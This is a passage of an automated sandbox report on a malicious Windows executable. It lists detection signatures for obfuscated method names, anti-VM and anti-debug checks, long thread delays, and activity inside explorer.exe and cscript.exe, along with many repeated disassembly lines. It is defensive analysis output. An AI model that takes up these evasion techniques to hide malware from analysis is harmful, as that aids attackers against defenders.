          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, ivabNJIhnbOdkS7rrr.csHigh entropy of concatenated method names: 'o1qX1oJVTN', 'B9oXamdYkC', 'B8XXeRYNPB', 'MOUXP4OBAy', 'nP5X0BQfkF', 'nKbXjW4VvV', 'xGCXwYsiyZ', 'ygqXWSac3I', 'Jy6XnoAFUn', 'xtFXV08hQV'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, cSTkKnzu2HtwIbII1D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qYbJ3NV0wM', 'XccJEmKgpy', 'r0KJGDnVlG', 'TQMJmvjmvK', 'fERJkraUxu', 'DGhJJOfTHF', 'knEJORKHuy'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, jSdj7uDf7R3NOvSWKI.csHigh entropy of concatenated method names: 'cwemgCHmSA', 'DKUmBx45SN', 'UMOkbY6cRg', 'Yc1k4NHj9u', 'YILmLHm7Aw', 'd8Jm8FojyM', 'BAPmZSkCNo', 'PtumYxUQQB', 'Hxqm70LOeV', 'z4NmiGRYIB'
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTR
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 7500000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 6E80000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 8500000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9865Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeWindow / User API: threadDelayed 9289Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 1.4 %
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 7244Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe TID: 4320Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2208Thread sleep count: 107 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2208Thread sleep time: -214000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2208Thread sleep count: 9865 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2208Thread sleep time: -19730000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep count: 123 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep time: -246000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep count: 9289 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 2608Thread sleep time: -18578000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_00412674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,7_2_00412674
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeThread delayed: delay time: 240000Jump to behavior
          Source: explorer.exe, 00000006.00000003.31961855101.0000000009080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31966305663.0000000009095000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\ksfilter.inf_loc
          Source: explorer.exe, 00000006.00000000.30301008086.000000000C580000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C580000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040AA82 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_0040AA82
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01804180 mov eax, dword ptr fs:[00000030h]5_2_01804180
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01804180 mov eax, dword ptr fs:[00000030h]5_2_01804180
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01804180 mov eax, dword ptr fs:[00000030h]5_2_01804180
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01841190 mov eax, dword ptr fs:[00000030h]5_2_01841190
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01841190 mov eax, dword ptr fs:[00000030h]5_2_01841190
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01829194 mov eax, dword ptr fs:[00000030h]5_2_01829194
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E1A4 mov eax, dword ptr fs:[00000030h]5_2_0183E1A4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E1A4 mov eax, dword ptr fs:[00000030h]5_2_0183E1A4
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA147 mov eax, dword ptr fs:[00000030h]5_2_017FA147
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA147 mov eax, dword ptr fs:[00000030h]5_2_017FA147
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA147 mov eax, dword ptr fs:[00000030h]5_2_017FA147
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018341BB mov ecx, dword ptr fs:[00000030h]5_2_018341BB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018341BB mov eax, dword ptr fs:[00000030h]5_2_018341BB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018341BB mov eax, dword ptr fs:[00000030h]5_2_018341BB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D51B6 mov eax, dword ptr fs:[00000030h]5_2_018D51B6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018331BE mov eax, dword ptr fs:[00000030h]5_2_018331BE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018331BE mov eax, dword ptr fs:[00000030h]5_2_018331BE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018101C0 mov eax, dword ptr fs:[00000030h]5_2_018101C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018101C0 mov eax, dword ptr fs:[00000030h]5_2_018101C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018151C0 mov eax, dword ptr fs:[00000030h]5_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018151C0 mov eax, dword ptr fs:[00000030h]5_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018151C0 mov eax, dword ptr fs:[00000030h]5_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018151C0 mov eax, dword ptr fs:[00000030h]5_2_018151C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C81EE mov eax, dword ptr fs:[00000030h]5_2_018C81EE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C81EE mov eax, dword ptr fs:[00000030h]5_2_018C81EE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182B1E0 mov eax, dword ptr fs:[00000030h]5_2_0182B1E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h]5_2_0180A1E3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h]5_2_0180A1E3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h]5_2_0180A1E3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h]5_2_0180A1E3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A1E3 mov eax, dword ptr fs:[00000030h]5_2_0180A1E3
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018091E5 mov eax, dword ptr fs:[00000030h]5_2_018091E5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018091E5 mov eax, dword ptr fs:[00000030h]5_2_018091E5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FF113 mov eax, dword ptr fs:[00000030h]5_2_017FF113
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018101F1 mov eax, dword ptr fs:[00000030h]5_2_018101F1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018101F1 mov eax, dword ptr fs:[00000030h]5_2_018101F1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018101F1 mov eax, dword ptr fs:[00000030h]5_2_018101F1
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F1F0 mov eax, dword ptr fs:[00000030h]5_2_0182F1F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F1F0 mov eax, dword ptr fs:[00000030h]5_2_0182F1F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182510F mov eax, dword ptr fs:[00000030h]5_2_0182510F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180510D mov eax, dword ptr fs:[00000030h]5_2_0180510D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F91F0 mov eax, dword ptr fs:[00000030h]5_2_017F91F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F91F0 mov eax, dword ptr fs:[00000030h]5_2_017F91F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F81EB mov eax, dword ptr fs:[00000030h]5_2_017F81EB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01830118 mov eax, dword ptr fs:[00000030h]5_2_01830118
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01837128 mov eax, dword ptr fs:[00000030h]5_2_01837128
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01837128 mov eax, dword ptr fs:[00000030h]5_2_01837128
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF13E mov eax, dword ptr fs:[00000030h]5_2_018BF13E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188A130 mov eax, dword ptr fs:[00000030h]5_2_0188A130
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189314A mov eax, dword ptr fs:[00000030h]5_2_0189314A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189314A mov eax, dword ptr fs:[00000030h]5_2_0189314A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189314A mov eax, dword ptr fs:[00000030h]5_2_0189314A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189314A mov eax, dword ptr fs:[00000030h]5_2_0189314A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D5149 mov eax, dword ptr fs:[00000030h]5_2_018D5149
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D3157 mov eax, dword ptr fs:[00000030h]5_2_018D3157
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D3157 mov eax, dword ptr fs:[00000030h]5_2_018D3157
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D3157 mov eax, dword ptr fs:[00000030h]5_2_018D3157
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183415F mov eax, dword ptr fs:[00000030h]5_2_0183415F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183716D mov eax, dword ptr fs:[00000030h]5_2_0183716D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01806179 mov eax, dword ptr fs:[00000030h]5_2_01806179
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0185717A mov eax, dword ptr fs:[00000030h]5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0185717A mov eax, dword ptr fs:[00000030h]5_2_0185717A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D4080 mov eax, dword ptr fs:[00000030h]5_2_018D4080
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018400A5 mov eax, dword ptr fs:[00000030h]5_2_018400A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BB0AF mov eax, dword ptr fs:[00000030h]5_2_018BB0AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
